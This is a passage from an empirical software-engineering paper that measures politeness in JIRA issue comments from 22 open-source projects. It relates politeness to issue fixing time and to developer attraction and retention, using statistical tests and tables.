http://dx.doi.org/10.7717/peerj-cs.73 Rigby & Hassan (2007) analyzed, using a psychometrically-based linguistic analysis tool, the five big personality traits of software developers in the Apache httpd server mailing list. The authors found that two developers responsible for the major Apache releases had similar personalities and their personalities were different from other developers. Bazelli, Hindle & Stroulia (2013) analyzed questions and answers on stackoverflow.com to determine the developer personality traits, using the Linguistic Inquiry and Word Count (Pennebaker, Francis & Booth, 2001). The authors found that the top reputed authors were more extroverted and expressed less negative emotions than authors of down voted posts. Tourani, Jiang & Adams (2014) evaluated the use of automatic sentiment analysis to identify distress or happiness in a team of developers. They extracted sentiment values from the mailing lists of two mature projects of the Apache software foundation, considering developers and users. The authors found that an automatic sentiment analysis tool obtained low precision on email messages (due to long size of the analyzed text) and that users and developers express positive and negative sentiment on mailing lists. Murgia et al. (2014b) analyzed whether issue reports carried any emotional information about software development. The authors found that issue reports contain emotions regarding design choices, maintenance activity or colleagues. Gómez et al. (2012) performed an experiment to evaluate whether the level of extraversion in a team influenced the final quality of the software products obtained and the satisfaction perceived while this work was being carried out. Results indicated that when forming work teams, project managers should carry out a personality test in order to balance the amount of extraverted team members with those who are not extraverted. This would permit the team members to feel satisfied with the work carried out by the team without reducing the quality of the software products developed. Acuña, Gómez & Juristo (2008), performed empirical research examining the work climate within software development teams. The authors attempted to understand if team climate (defined as the shared perceptions of team work procedures and practices) bore any relation to software product quality. They found that high team vision preferences and high participative safety perceptions of the team were significantly related to better software. In a study conducted by Fagerholm et al. (2014), it was shown that software teams engaged in a constant cycle of interpreting their performance. Thus, enhancing performance experiences requires integration of communication, team spirit and team identity into the development process. Jongeling, Datta & Serebrenik (2015) studied whether the sentiment analysis tools agreed with the sentiment recognized by human evaluators as well as with each other. Furthermore, the authors evaluated the impact of the choice of a sentiment analysis tool on software engineering studies by conducting a simple study of differences in issue resolution times for positive, negative and neutral texts. The authors repeated the study for seven datasets and different sentiment analysis tools and observed that the disagreement between the tools can lead to contradictory conclusions. Destefanis et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.73 7/35 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.73 Table 1 Selected Projects Statistics. Project # of comments # of developers HBase 91,016 951 Hadoop Common 61,958 1,243 Derby 52,668 675 Lucene Core 50,152 1,107 Hadoop HDFS 42,208 757 Cassandra 41,966 1,177 Solr 41,695 1,590 Hive 39,002 850 Hadoop Map/Reduce 34,793 875 Harmony 28,619 316 OFBiz 25,694 578 Infrastructure 25,439 1,362 Camel 24,109 908 ZooKeeper 16,672 495 GeoServer 17,424 705 Geronimo 18,017 499 Groovy 18,186 1,305 Hibernate ORM 23,575 4,037 JBoss 23,035 453 JRuby 22,233 1,523 Pig 21,662 549 Wicket 17,449 1,243 Tot 737,572 18,144 EXPERIMENTAL SETUP Dataset We built our dataset collecting data from the Apache Software Foundation Issue Tracking system, JIRA (https://www.atlassian.com/software/jira). An Issue Tracking System (ITS) is a repository used by software developers to support the software development process. It supports corrective maintenance activity like Bug Tracking systems, along with other types of maintenance requests. We mined the ITS of the Apache Software Foundation collecting issues from October 2002 to December 2013. In order to create our dataset, since the focus of our study was about the usefulness of Agile boards, we selected projects for which the JIRA Agile board contained a significant amount of activity. Namely, we selected those systems for which the Agile board contained more than 15,000 comments (in order to build a time series with sufficient data) and there was a recorded monthly activity (i.e., developers were active for every considered month). The JIRA dataset contains roughly 1,000 projects, 150 of which characterised by more than 1,000 comments. Table 1 shows the corpus of 22 projects selected for our analysis, highlighting the number of comments recorded for each project and the number of developers involved. Destefanis et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.73 8/35 https://peerj.com https://www.atlassian.com/software/jira http://dx.doi.org/10.7717/peerj-cs.73 1User’s names are reported as <dev_name_a> for the sake of privacy. Table 2 Examples of polite and impolite comments. Comment POLITE Hey <dev_name_a>, Would you be interested in contributing a fix and a test case for this as well? Thanks, <dev_name_b> YES <dev_name>, can you open a new JIRA for those suggestions? I’ll be happy to review. YES <dev_name>, the latest patch isn’t applying cleanly to trunk - could you resubmit it please? Thanks. YES <dev_name>, Since you can reproduce, do you still want the logs? I think I still have them if needed. YES Why are you cloning tickets? Don’t do that. NO shouldnt it check for existence of tarball even before it tries to allocate and error out ??? NO <dev_name_a>, why no unit test? <dev_name_b>, why didn’t you wait for +1 from Hudson??? NO > this isn’t the forum to clarify Why not? The question is whether this is redundant with Cascading, so comparisons are certainly relevant, no? NO Comments politeness Given some texts, the tool developed by Danescu-Niculescu-Mizil et al. (2013) calculates the politeness of its sentences providing one of two possible labels: polite or impolite as result. impolite. Table 2 shows some examples of polite and impolite comments as classified by the tool.1 Destefanis et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.73 9/35 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.73 Figure 2 Example of timeline for JIRA issue. We evaluated the percentage of polite comments per month considering all comments posted in a certain month. For each comment we assigned a value according to the following rules: • Value of +1 for those comments marked as polite by the tool. • Value of �1 for those comments marked as impolite. Finally, we calculated the percentage of polite comments for a certain month. We analyzed the politeness of about 700K comments. Issue politeness The next step was to infer the politeness of issues from the knowledge of comments politeness. We grouped issues together as follows: • we first divided comments in polite sets: polite, impolite; • we divided issues in three sets: polite issues (commented only with polite comments), impolite issues (commented only by impolite comments) and mixed issue (commented with both polite and impolite comments). For each issue we evaluated the politeness expressed in its comments and we then divided issues in three groups: polite issues containing polite comments, impolite issues containing impolite comments and mixed issues containing both polite and impolite comments. Our dataset contains in total 174,871 issues, 5.3% (9,269) of the total were classified as polite, 56.9% (99,501) classified as impolite, 37.8% (66,101) classified as mixed. For each of this three groups of issues we evaluated the issue fixing time as the difference between resolution and creation time. Figure 2 shows the typical issue timeline in JIRA: • Tcr represents the time when an issue is created. • Tcl represents the time when an issue is closed. • Ta represents the time when an issue is assigned to a developer. • Ts is the time when a developer subscribes to an issue that has been assigned to them. To infer the issue fixing time (abbreviated as IFT), we used the approach proposed by Murgia et al. (2014a). We computed the time interval between the last time an issue had been closed and the last time it had been subscribed to by an assignee. Attractiveness Our research focuses around the concepts developed by Yamashita et al. (2014) and Yamashita et al. (2016) who introduced the concepts of magnetism and stickiness for Destefanis et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.73 10/35 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.73 2We consider as active all developers who posted/commented/resolved/modified an issue during the observed time (from dev_1 to dev_10). Figure 3 Example of Magnetism and Stickiness metrics computation in 2011. a software project. A project is classified as Magnetic if it has the ability to attract new developers over time. Stickiness is the ability of a project to keep its developers over time. We measured these two metrics by considering the period of observation of one year. Figure 3 shows an example of the evaluation of Magnetism and Stickiness metrics. In this example, we were interested in calculating the value of Magnetism and Stickiness for 2011. From 2010 to 2012, we had a total of 10 active2 developers. In 2011, there were seven active developers and 2 of them (highlighted with black heads) were new. Only 3 (highlighted with grey heads) of the seven active developers in 2011 were also active in 2012. We can then calculate the Magnetism and Stickiness as follows: • Magnetism is the fraction of new active developers during the observed time interval, in our example 2/10 (dev_6 and dev_7 were active in 2011 but not in 2010). • Stickiness is the fraction of active developers that were also active during next time interval, in our example 3/7 (dev_1, dev_2, dev_3 were active in 2011 and in 2012). Data analysis To perform statistical testing, filter the data and produce the visualisation of the results, we used scikit-learn (http://scikit-learn.org/stable/) for RQ1, and the R projects for statistical computing (R Development Core Team, 2014) for the other RQs. To facilitate replication of our study, we have created a replication package (https://bitbucket.org/giuseppedestefanis/ peerjcs_replicationpackage) which contains the dataset, the tool used to detect politeness and the R and Python scripts for performing the statistical analysis. RESULTS Does a relationship exist between politeness and issues fixing time? Motivation. Murgia et al. (2014a) demonstrated the influence of maintenance type on the issue fixing time, while Zhang, Gong & Versteeg (2013) developed a prediction model for bug fixing time for commercial software. Destefanis et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.73 11/35 https://peerj.com http://scikit-learn.org/stable/ https://bitbucket.org/giuseppedestefanis/peerjcs_replicationpackage https://bitbucket.org/giuseppedestefanis/peerjcs_replicationpackage http://dx.doi.org/10.7717/peerj-cs.73 In another study, Zhang et al. (2012) analyzed the interval between bug assignment and the time when bug fixing starts (bugs are classified as a type of issue in JIRA). After a bug being reported and assigned, some developers will immediately start fixing the bug while others will start bug fixing after a long period. The authors explored the delays of developers empirically analyzing three open source software systems. They studied factors affecting bug fixing time along three dimensions (bug reports, source code involved in the fix and code changes that are required to fix the bug) and compared such factors using logistic regression models. The most influential factors on bug fixing appeared to be the severity of a bug, its description and comments and operating system where a bug was found. Hence, there are indeed many factors able to influence bugs fixing time and issues fixing time; in this case, we were interested in finding out if politeness expressed by developers in comments had an influence on issue fixing time. To detect differences among the fixing time of polite, impolite and mixed issues, we used the Kruskal–Wallis test. Such a test is non parametric and unpaired (Siegel, 1956; Kruskal & Wallis, 1952; Weiss et al., 2007). The test can be used with no restrictions or hypotheses on the statistical distribution of the sample populations. The test is suitable for comparing differences among the medians of two or more populations when their distributions are not gaussian. We grouped all the issues (by category) of all the projects contained in our corpus and then we tested the null hypothesis H0: the three distributions of issue fixing time are equal for the three typologies of considered issues (polite, impolite, mixed). The outcome of the Kruskal–Wallis test is a p-value p < 2�16 indicating that the three distributions are statistically different. Figure 4 shows the box-plot of the issues fixing time for the three groups of issues considered (polite, impolite and mixed) for all the issues analysed. The issues fixing time is expressed in hours on a logarithmic scale. The median of the issue fixing time for polite issues is shorter than that for impolite and mixed issues, while the median for impolite issues is shorter than the one for mixed issues. Figure 4 also shows that the percentage of impolite issues is the highest (56.9%), followed by mixed issues (37.7%) and then polite issue (5.3%). Figures 5 and 6 show the boxplots of the issue fixing time when considering single projects. We considered the four projects (Hadoop HDFS, Derby, Lucene-Core, Hadoop Map/Reduce) with the highest number of comments in our corpus as examples. For visualising the boxplots of Figs. 5 and 6, we grouped the issues by project and then by category. The results obtained with all the issues grouped together (without distinguishing for project) are confirmed also with these four examples. The median of the issues for polite issues is lower than the other two medians, and also in this cases issues with mixed polite and impolite comments have a longer issue fixing time than issues with impolite comments. Findings. Issue fixing time for polite issues is shorter than issue fixing time for impolite and mixed issues. Does politeness among developers a�ect the attractiveness of a project? Motivation. Magnetism and Stickiness are two interesting metrics able to describe the general health of a project; namely, if a project is able to attract new developers and to Destefanis et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.73 12/35 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.73 Figure 4 Box-plot of the fixing-time expressed in Hours. The number in parentheses next to issue group indicates the percentage of issues. Figure 5 Box-plot of the fixing-time expressed in Hours for single projects. The number in parentheses next to polite/impolite indicates the per- centage of impolite and polite issues. keep them over time we can then conclude that the project is healthy. On the other hand, if a project is not magnetic and is not sticky we can conclude that the project is losing developers and is not attracting new developers over time. Although there may be many factors influencing magnetism and stickiness, we were interested in analysing the correlation between politeness expressed by developers in their comments and these two metrics. To detect if there was a direct correlation between magnetism and stickiness of a project and politeness, we considered an observation time of one month. During this time interval Destefanis et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.73 13/35 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.73 Figure 6 Box-plot of the fixing-time expressed in Hours for single projects. The number in parentheses next to polite/impolite indicates the per- centage of impolite and polite issues. we measured magnetism, stickiness and the percentage of polite comments. Since we had no evidence that the politeness in the observed time could affect magnetism and stickiness in the same time interval or in the following observation time, we evaluated a cross-correlation coefficient. To study the cross correlation, we first studied the time series for stationarity. A time series Xt (t = 1,2...) is considered to be stationary if its statistical properties (autocorrelation, variance, expectation) do not vary with time (Priestley, 1981; Priestley, 1988; Hamilton, 1994). Time series stationarity is a condition required for calculating the most common correlation coefficient. However, it is still possible to study cross-correlation between time series which are not stationary (Kri≤toufek, 2014). We used the R package fpp (https://cran.r-project.org/package=fpp) and we applied: • Ljung–Box test (Box & Pierce, 1970; Ljung & Box, 1978): this test for stationarity confirms independence of increments, where rejection of the null hypothesis H0 indicates stationarity (the null hypothesis H0 is that the data are non-stationary); • Augmented Dickey-Fuller (ADF) t-statistic test (Said & Dickey, 1984; Diebold & Rudebusch, 1991; Banerjee et al., 1993): in the Augmented Dickey-Fuller (ADF) t-statistic test the null hypothesis H0 is that the data are non-stationary (small p-values (e.g., less than 0.05) suggest that the time-series is stationary). • Kwiatkowski-Phillips–Schmidt–Shin test (KPSS) (Kwiatkowski et al., 1992): this test reverses the hypotheses, hence the null-hypothesis H0 is that the time-series is stationary. Small p-values (e.g., less than 0.05) suggest that the time-series is not stationary. We decided to proceed using the results obtained from the three tests used for checking stationarity of a time series and then consider the worst case scenario (e.g., even if only one test out of three indicated rejection of the hypothesis of stationarity for a given time series, we considered that time series as non stationary). The results of the three tests are shown in Table 3. The cells in grey indicate that the p-value for the corresponding test is below 5% (our cutoff for significance), thus we infer in these cases that the test indicates stationarity Destefanis et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.73 14/35 https://peerj.com https://cran.r-project.org/package=fpp http://dx.doi.org/10.7717/peerj-cs.73 Table 3 P-value results for stationarity tests (Ljung–Box, Augmented Dickey-Fuller, KPSS). Project Politeness Magnetism Stickiness HBase 0.00023 0.028 0.01 0.9765 0.01 0.0285 0.266 0.156 0.1 Hadoop C. 0.00072 0.59 0.044 0.0677 0.01 0.1 3.062e-08 0.01 0.01 Derby 1.626e-08 0.01 0.01 0.19 0.049 0.1 0.037 0.094 0.01 Lucene C. 0.498 0.0173 0.017 0.38 0.08 0.01 3.105e-13 0.48 0.01 Hadoop HDFS 0.025 0.79 0.09 0.007 0.01 0.01 0.093 0.30 0.036 Cassandra 0.25 0.043 0.1 0.57 0.18 0.1 0.099 0.387 0.01 Solr 0.0075 0.31 0.01 0.0003 0.01 1.615e-07 0.01 0.01 0.01 Hive 8.075e-08 0.113 0.01 0.335 0.32 0.01 0.006 0.28 0.01 Hadoop MR 6.815e-05 0.4 0.01 0.0003 0.06 0.01 8.821e-08 0.92 0.012 Harmony 0.03 0.012 0.01 0.0019 0.23 0.058 3.658e-08 0.01 0.01 OFBiz 0.0006 0.01 0.01 0.91 0.09 0.1 7.986e-05 0.01 0.01 Infrastructure 0.16 0.01 0.1 0.0002 0.01 0.99 0.53 0.028 0.01 Camel 0.00097 0.01 0.01 0.79 0.01 0.1 4.885e-15 0.36 0.01 ZooKeeper 0.14 0.45 0.046 0.26 0.01 0.1 0.398 0.17 0.01 GeoServer 0.064 0.01 0.01 0.0005 0.01 0.1 0.49 0.027 0.011 Geronimo 0.32 0.01 0.1 0.84 0.078 0.1 2.665e-15 0.59 0.01 Groovy 8.514e-05 0.01 0.047 0.14 0.01 0.1 1.225e-07 0.01 0.01 Hibernate ORM 4.393e-05 0.063 0.016 0.15 0.01 0.06 3.074e-12 0.01 0.033 JBoss 0.36 0.01 0.1 0.53 0.95 0.027 2.2e-16 0.88 0.01 JRuby 0.67 0.29 0.02 0.074 0.01 0.1 0.00075 0.32 0.01 Pig 7.096e-05 0.12 0.02 0.59 0.01 0.078 2.2e-16 0.45 0.01 Wicket 0.084 0.064 0.1 0.093 0.202 0.1 1.105e-05 0.33 0.018 (on the contrary, cells in white indicate that the p-value for the corresponding test is above 5%). For example, for the percentage of polite comments time series of HBase (row 1, first three cells), we have that the first two tests (Box-Ljung and Augmented Dickey-Fuller) suggest stationarity, while the third test (KPSS) rejects the hypothesis of stationarity. For the majority of the cases, the tests provides discordant results. Only for Magnetism for Infrastructure (row 12) and GeoServer (row 15) there is agreement among the three tests. Thus, we considered all the time series in Table 3, except for the cases mentioned before, being not stationary. Table 4 shows the results obtained applying the algorithm illustrated in Kri≤toufek (2014) (http://stats.stackexchange.com/questions/149799/code- for-detrended-cross-correlation-in-r). For the majority of the cases there is a weak positive correlation between politeness and Magnetism (14 projects out 22) and politeness and Stickiness (13 projects out 22). We also calculated the cross correlation (using the ccf function in R) after applying time series differencing to transform time series that were not stationary in Table 3 into stationary. The D differencing operator applied to a time series k is to create a new series kn whose value at time t is the difference between k(t +t1) and k(t). This method is useful for removing cycles and trends. Destefanis et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.73 15/35 https://peerj.com http://stats.stackexchange.com/questions/149799/code-for-detrended-cross-correlation-in-r http://stats.stackexchange.com/questions/149799/code-for-detrended-cross-correlation-in-r http://dx.doi.org/10.7717/peerj-cs.73 Table 4 Cross-Correlation for not stationary series. Project Politeness-Magnetism Politeness-Stickiness HBase 0.131 �0.096 Hadoop Common 0.024 0.018 Derby �0.0018 0.0147 Lucene Core 0.32 0.137 Hadoop HDFS �0.08 0.104 Cassandra 0.296 �0.136 Solr �0.169 0.0018 Hive 0.305 0.184 Hadoop Map/Reduce �0.047 0.052 Harmony 0.21 0.026 OFBiz 0.11 0.097 Infrastructure �0.025 0.292 Camel 0.115 0.013 ZooKeeper �0.19 �0.11 GeoServer 0.22 �0.13 Geronimo 0.23 0.27 Groovy 0.013 �0.22 Hibernate ORM 0.02 �0.1 JBoss �0.26 �0.2 JRuby �0.12 �0.06 Pig 0.26 0.14 Wicket 0.016 �0.14 Figure 7 Differencing Time-series. As an example, Fig. 7A shows the Magnetism time-series for Lucene Core. From Table 3, row 4, we can see that the time series is not stationary, since all the three test failed in proving stationarity. By applying the differencing operator (first differencing), we obtain the new time-series in Fig. 7B. The new time-series in Fig. 7B is stationary; all the three tests provide the same indication for stationarity (Box-Ljung: p � value = 1.4e � 13, Augmented Dickey-Fuller: Destefanis et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.73 16/35 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.73 Figure 8 Cross-Correlation—Lucene Core. p�value = 0.01, KPSS: p�value = 0.1) and the plot appears roughly horizontal (the visual inspection is a practical rule of thumb which can help when evaluating a time-series for stationarity). If the time-series under study are stationary, it is possible to calculate the cross correlation. The cross correlation function (ccf) is defined as the set of correlations (height of the vertical line segments in Fig. 8) between two time series xt + h and yt for lags h = 0,±1,±2,.... A negative value for h represents a correlation between the x-series at a time before t and the y-series at time t. For example, if the lag h = �1, then the cross correlation value would give the correlation between xt �1 and yt . On the contrary, negative lines correspond to anti-correlated events. The ccf helps to identify lags of xt that could be predictors of the yt series. • When h < 0 (left side of plots in Figs. 8A and 8B), x leads y. • When h > 0 (right side of plots in Figs. 8A and 8B), y leads x. Table 5 shows the maximum value of the cross-correlation coefficient between the percentage of polite comments and Magnetism and the percentage of polite comments and Stickiness and the lag (or lags) in which the maximum value occurs. The values are calculated using the R function ccf . A negative lag x means that the current values of Stickiness are likely to be higher, if x month before the percentage of polite comments was higher. On the other hand, a positive lag z means that a current higher percentage of polite comments is linked with higher Magnetism z months later. For both Magnetism and Stickiness, we observe that a positive maximum correlation exists. The difference sin lags presented in Table 5 could be explained looking at the composition of our corpus. We selected the projects with a higher number of comments from JIRA, regardless of domain, history and/or programming language used. Additionally, there are systems which are younger than others and, as a consequence, the time series may have different lengths. Findings. Magnetism and Stickiness are positively correlated with the percentage of polite comments. Destefanis et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.73 17/35 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.73 Table 5 Politeness vs Magnet and Sticky Cross-Correlation Coefficient. Project Pol Vs Mag Lag Pol Vs Stick Lag HBase 0.378 �1,7 0.418 6 Hadoop Common 0.283 �5 0.203 5 Derby 0.181 15 0.185 �1 Lucene Core 0.31 �6 0.243 �11 Hadoop HDFS 0.3 0 0.32 �1 Cassandra 0.414 5 0.315 2 Solr 0.33 �4 0.23 12 Hive 0.4 �14 0.3 �13 Hadoop Map/Reduce 0.35 3 0.35 3 Harmony 0.3 �5 0.35 1 OFBiz 0.25 14 0.22 �11 Infrastructure 0.17 4 0.26 �11 Camel 0.28 �12 0.26 �14,-2,7 ZooKeeper 0.41 6 0.27 �2 GeoServer 0.3 0 0.2 �5,�1 Geronimo 0.32 0 0.24 0 Groovy 0.2 3 0.21 2 JBoss 0.3 8 0.43 5 Hibernate ORM 0.23 1 0.18 �3 JRuby 0.25 10 0.2 �10 Pig 0.38 11 0.17 7,9 Wicket 0.3 �13 0.27 11 Does the percentage of polite comments vary over time? Motivation. Politeness has an influence on the productivity of a team (Ortu et al., 2015b; Ortu et al., 2015a; Ortu et al., 2015c). Thus, it is interesting to understand if there are periods of time in which the level of politeness decreases (potentially affecting the productivity of a team). We calculated the level of politeness for any given issue and then plotted the percentage of polite comments per month grouping issues per project. For each project considered in this study, the percentage of polite comments over time can be seen as time series, hence we performed tests for randomness and seasonality to understand the nature of politeness time series. A time series is considered random if it consists of independent values from the same distribution. We used the Bartels test (Bartels, 1982) for studying randomness (Brockwell & Davis, 2006) and the results from the Augmented Dickey-Fuller test and KPSS test from ‘Does politeness among developers affect the attractiveness of a project?’ for studying seasonality. We used the R package randtest (https://cran.r-project.org/web/packages/randtests/randtests.pdf) and we applied: • Bartels test: in this test, the null hypothesis H0 of randomness is tested against non randomness. Destefanis et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.73 18/35 https://peerj.com https://cran.r-project.org/web/packages/randtests/randtests.pdf http://dx.doi.org/10.7717/peerj-cs.73 Table 6 Randomness and seasonality test results for Politeness. Randomness Seasonality Project Bartels-rank p-value Aug. D-F p-value KPSS HBase 0.0006529 0.028 0.01 Hadoop Common 3.362e-06 0.59 0.044 Derby 6.824e-08 0.01 0.01 Lucene Core 0.008213 0.0173 0.017 Hadoop HDFS 1.622e-06 0.79 0.09 Cassandra 0.3747 0.043 0.1 Solr 0.0026 0.31 0.01 Hive 1.044e-09 0.113 0.01 Hadoop Map/Reduce 0.0004533 0.4 0.01 Harmony 0.001998 0.012 0.01 OFBiz 0.0003783 0.01 0.01 Infrastructure 0.02888 0.01 0.1 Camel 2.951e-06 0.01 0.01 ZooKeeper 0.07181 0.45 0.046 GeoServer 0.0008848 0.01 0.01 Geronimo 0.0702 0.01 0.1 Groovy 0.00025 0.01 0.047 Hibernate ORM 0.000384 0.063 0.016 JBoss 0.2112 0.01 0.1 JRuby 0.6816 0.29 0.02 Pig 1.957e-05 0.12 0.02 Wicket 0.1448 0.064 0.1 For studying the seasonality of the percentage of polite comments time series, we considered the results (from ‘Does politeness among developers affect the attractiveness of a project?’) of the following tests: • Augmented Dickey Fuller test: the null hypothesis H0 is that the data are non-stationary and non-seasonal; • Kwiatkowski-Phillips–Schmidt–Shin (KPSS) test: the null hypothesis H0 is that the data are stationary and non-seasonal. The results of the tests are shown in Table 6. For randomness, the cells in grey indicate that the p-value for the corresponding test is higher than 5% (our cutoff for significance), thus we infer in these cases that the test indicates randomness (null hypothesis H0 of randomness). On the contrary, cells in white indicate that the p-value for the corresponding test is lower than 5%. In the majority of the cases (16 out 22), the percentage of polite comments time series were not random. For seasonality, the cells in grey indicate that the p-value for the corresponding test is less than 5% (our cutoff for significance), thus we infer in these cases that the test rejects the null hypothesis H0 of non-seasonality. Destefanis et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.73 19/35 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.73 Table 6 shows that for the Augmented Dickey Fuller test, 12 projects (HBase, Derby, Lucene Core, Cassandra, Harmony, OFBiz, Infrastructure, Camel, GeoServer, Geronimo, Groovy, JBoss) have a percentage of polite comments time series which presents seasonality, while 10 time series are not seasonal. For the KPSS test, the null hypothesis of non- seasonality is rejected for 16 time series (out of 22). It is interesting to note that there are variations in the percentage of polite comments over time. This is by no means a representation of a time dynamics, but simply the representation of random variation of the percentage of polite comments over time. Cassandra and OFBiz present seasonality (Table 6) and Fig. 9 shows the seasonal component determined using the stl function (https://stat.ethz.ch/R-manual/R-devel/library/stats/html/stl.html) in R. In Cassandra, Fig. 9(A), and OFbiz, Fig. 9(B), we see how the percentage of polite comments decreases for some time interval and increases for some others. It is also possible to analyse the percentage of polite comments trend, while for Cassandra the trend is increasing starting from the year 2011, for OFBiz the trend is decreasing. Findings. The percentage of polite comments does vary over time and in some cases it changes from lower percentage of polite comments to higher percentage of polite comments from two consecutive observation intervals. This fact could be related to the composition of our corpus. We considered only open source systems, hence there are no strict deadlines or particular busy days (such as Fridays, as suggested by ëliwerski, Zimmermann & Zeller (2005)). How does politeness vary with respect to JIRA maintenance types and issue priorities? Motivation. Understanding which typology of issue attracts more impolite comments could help both managers and developers better understand the development process and take action to better manage the distribution of issues within development teams. A classification of the type of issues, is provided on the JIRA wiki (https: //cwiki.apache.org/confluence/display/FLUME/Classification+of+JIRA+Issues). The following list gives a brief introduction: • Bug: this type of issue indicates a defect in the source code, such as logic errors, out-of-memory errors, memory leaks and run-time errors. Any failure of the product to perform as expected and any other unexpected or unwanted behaviour can be registered as type Bug. • SubTask: this type of issue indicates that a task must be completed as an element of a larger and more complex task. Subtask issues are useful for dividing a parent issue into a number of smaller tasks, more manageable units that can be assigned and tracked separately. • Task: this type of issue indicates a task that it is compulsory to complete. • Improvement: this type of issue indicates an improvement or enhancement to an existing feature of the system. • New Feature: this type of issue indicates a new feature of the product yet to be developed. Destefanis et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.73 20/35 https://peerj.com https://stat.ethz.ch/R-manual/R-devel/library/stats/html/stl.html https://cwiki.apache.org/confluence/display/FLUME/Classification+of+JIRA+Issues https://cwiki.apache.org/confluence/display/FLUME/Classification+of+JIRA+Issues http://dx.doi.org/10.7717/peerj-cs.73 Figure 9 Time series decomposition. Destefanis et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.73 21/35 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.73 Table 7 Maintenance statistics. Type IMPOLITE POLITE Bug 201,359 163,489 Sub-task 24,333 22,909 Task 19,379 14,442 Improvement 90,477 90,564 New Feature 33,640 39,538 Wish 2573 2681 Test 3788 3270 New JIRA Project 172 210 Brainstorming 98 172 Umbrella 87 144 Table 8 Priority statistics. Priotity IMPOLITE POLITE Blocker 20,657 19,049 Critical 21,517 19,410 Major 241,012 219,841 Minor 82,892 71,905 Optional 105 52 Trivial 12,009 8,479 • Wish: this type of issue is used to track general wishlist items, which could be classified as new features or improvements for the system under development. • Test: this type of issue can be used to track a new unit or integration test. • New JIRA Project: this type of issue indicates the request for a new JIRA project to be set up. • Brainstorming: this type of issue is more suitable for items in their early stage of formation not yet mature enough to be labelled as a Task or New Feature. It provides a bucket where thoughts and ideas from interested parties can be recorded as the discussion and exchange of ideas progresses. Once a resolution is made, a Task can be created with all the details defined during the brainstorming phase. • Umbrella: this type of issue is an overarching type comprised of one or more sub-tasks. Tables 7 and 8 provide information about the absolute number of issues (maintenance e priority) in our corpus. To detect the level of politeness for each category of issue, we grouped the issue comments for type of maintenance and priority. To justify claims such as ‘‘issues of type A tend to have more polite comments than issues of type B’’, we used the multiple contrast test procedure (Konietschke, Hothorn & Brunner, 2012) using a 5% error rate. Instead of following a classical two-step approach in which a global null hypothesis is tested to begin with, and as a second step multiple Destefanis et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.73 22/35 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.73 Table 9 Maintenance—significant results. Pair Lower Upper p-value Improvement—Bug 0.009 0.029 9.067173e–04 New Feature—Bug 0.042 0.077 9.409836e–06 New Feature—Improvement 0.023 0.059 2.411054e–04 Task—Improvement �0.085 �0.048 5.512420e–06 Sub-task—New Feature �0.071 �0.028 2.764748e–04 Task—New Feature �0.132 �0.083 1.791890e–07 Test—New Feature �0.083 �0.007 2.128063e–02 Wish—New Feature �0.116 �0.024 4.615626e–03 Task—Sub-task �0.081 �0.036 1.468676e–04 Test—Task 0.025 0.101 2.563559e–03 comparisons are used to test sub-hypotheses related to each pair of groups, to answer our research question, we used the Tukey’s test (Tukey, 1949) which is a single-step multiple comparison procedure and statistical test. To visualize the results obtained from the multiple contrast test procedure, we used the T⇠ -graph presented by Vasilescu et al. (2014a). This visual comparison of multiple distributions using T⇠-graphs provides an immediate understanding of groups located in higher positions in the graph, i.e., issue categories with higher politeness, while groups located in lower positions in the graph are related to issue categories with lower politeness. Other studies related to the application of T-graphs can be found in Vasilescu, Filkov & Serebrenik (2013) and Vasilescu et al. (2014b). The approach used to build a T⇠ -graph is the following (cf. Vasilescu et al. (2014a)): • for each pair of groups it is necessary to analyse the 95% confidence interval to test if the corresponding null sub-hypothesis can be rejected; • If the lower boundary of the interval is greater than zero for groups A and B, we conclude that the metric value is higher in A than in B; • If the upper boundary of the interval is less than zero for groups A and B, we conclude that the metric value is lower in A than in B; • If the lower boundary of the interval is less than zero and the upper boundary is greater than zero, we conclude that the data does not provide enough evidence to reject the null hypothesis. • based on the results of the comparisons we construct the graph with nodes being groups and containing edges (A, B) if the metric value is higher in A than in B. The result of the multiple contrast test procedure are presented in Tables 9 and 10. We used the mctp function for the Tukey’s test, from the nparcomp R package (https://cran.r-project.org/web/packages/nparcomp/nparcomp.pdf) to obtain the tables. Table 9 summarises the significant results which we used to build a T⇠ -graph. For the category Brainstorming, the upper boundary of the interval is less than zero and the upper boundary is greater than zero. In this situation the data does not provide enough evidence Destefanis et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.73 23/35 https://peerj.com https://cran.r-project.org/web/packages/nparcomp/nparcomp.pdf http://dx.doi.org/10.7717/peerj-cs.73 Figure 10 T⇠ -graph for issue maintenance. Table 10 Issue priority classification. Pair Lower Upper p-value Critical—Blocker �0.018 0.022 0.997 Major—Blocker �0.070 �0.042 0 Minor—Blocker �0.093 �0.065 0 Trivial—Blocker �0.149 �0.113 0 Major—Critical �0.073 �0.043 0 Minor—Critical �0.097 �0.066 0 Trivial—Critical �0.152 �0.115 0 Minor—Major �0.030 �0.016 0 Trivial—Major �0.088 �0.062 0 Trivial—Minor �0.066 �0.039 0 and we cannot conclude that, for example, Brainstorming issue are more (or less) polite the Bug issues. Same thing happens for the category 